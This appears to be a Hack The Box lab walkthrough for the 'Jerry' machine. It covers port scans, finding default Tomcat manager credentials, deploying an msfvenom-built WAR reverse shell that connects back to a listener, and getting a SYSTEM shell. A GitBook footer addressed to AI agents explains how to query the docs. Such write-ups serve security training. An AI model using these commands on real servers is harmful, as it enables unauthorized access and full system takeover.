> For the complete documentation index, see [llms.txt](https://oscp-exodussec.gitbook.io/cheatsheet55/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp-exodussec.gitbook.io/cheatsheet55/htb-windows-oscp-prep/jerry.md). # Jerry **Reconnaissance:** ``` ┌──(kali💀kali)-[~] └─$ sudo nmap -sC -sV -O 10.10.10.95 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-title: Apache Tomcat/7.0.88 |_http-server-header: Apache-Coyote/1.1 |_http-open-proxy: Proxy might be redirecting requests |_http-favicon: Apache Tomcat Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port ┌──(kali💀kali)-[~] └─$ sudo nmap -sU -O 10.10.10.95 Not shown: 1000 open|filtered udp ports (no-response) ``` ``` ┌──(kali💀kali)-[~] └─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -t 30 -e -k -x .html,.php -u http://10.10.10.95:8080 http://10.10.10.95:8080/aux (Status: 200) [Size: 0] http://10.10.10.95:8080/com1 (Status: 200) [Size: 0] http://10.10.10.95:8080/com2 (Status: 200) [Size: 0] http://10.10.10.95:8080/com3 (Status: 200) [Size: 0] http://10.10.10.95:8080/con (Status: 200) [Size: 0] http://10.10.10.95:8080/docs (Status: 302) [Size: 0] [--> /docs/] http://10.10.10.95:8080/examples (Status: 302) [Size: 0] [--> /examples/] http://10.10.10.95:8080/favicon.ico (Status: 200) [Size: 21630] http://10.10.10.95:8080/host-manager (Status: 302) [Size: 0] [--> /host-manager/] http://10.10.10.95:8080/lpt1 (Status: 200) [Size: 0] http://10.10.10.95:8080/lpt2 (Status: 200) [Size: 0] http://10.10.10.95:8080/manager (Status: 302) [Size: 0] [--> /manager/] http://10.10.10.95:8080/nul (Status: 200) [Size: 0] ``` ``` ┌──(kali💀kali)-[~] └─$ nikto -host 10.10.10.95:8080 + Server: Apache-Coyote/1.1 + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all' to force check all possible dirs) + /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon + OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS . + HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + /: Web Server returns a valid response with junk HTTP methods which may cause false positives. + /examples/servlets/index.html: Apache Tomcat default JSP pages present. + /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104 + /manager/html: Default account found for 'Tomcat Manager Application' at (ID 'tomcat', PW 's3cret'). Apache Tomcat. See: CWE-16 + /host-manager/html: Default Tomcat Manager / Host Manager interface found. + /manager/html: Tomcat Manager / Host Manager interface found (pass protected). ``` We have one port open. * Port 8080: running Apache Tomcat/Coyote JSP engine 1.1 Before we move on to enumeration, let’s make some mental notes about the scan results. * Port 8080 is running Apache Tomcat and the nmap scan found the /manager/html page, which is the login page to the Manager interface. The nikto scan identified that this page is using the default credentials tomcat/s3cret. Apache Tomcat by design allows you to run code, so we can simply deploy a war file that sends a reverse shell back to our attack machine. **Exploitation:** Visit the /manager/html page and log in with the credentials tomcat/s3cret. [http://10.10.10.95:8080/manager/html]() Generate a war file that contains a reverse shell using msfvenom. ``` ┌──(kali💀kali)-[~/Desktop] └─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f war > shell.war ``` Upload the file on the Tomcat Application Manager and deploy it. Set up a listener on the target machine. ``` ┌──(kali💀kali)-[~] └─$ nc -nlvp 1234 ``` Click on the war file in the Tomcat Application Manager to execute our shell. ``` C:\apache-tomcat-7.0.88>whoami whoami nt authority\system ``` We get a shell with SYSTEM privileges! That was easy! We don’t even have to escalate our privileges for this box. ``` C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt" type "2 for the price of 1.txt user.txt 7004----------------------------- root.txt 04a8b3----------------------------- ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://oscp-exodussec.gitbook.io/cheatsheet55/htb-windows-oscp-prep/jerry.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.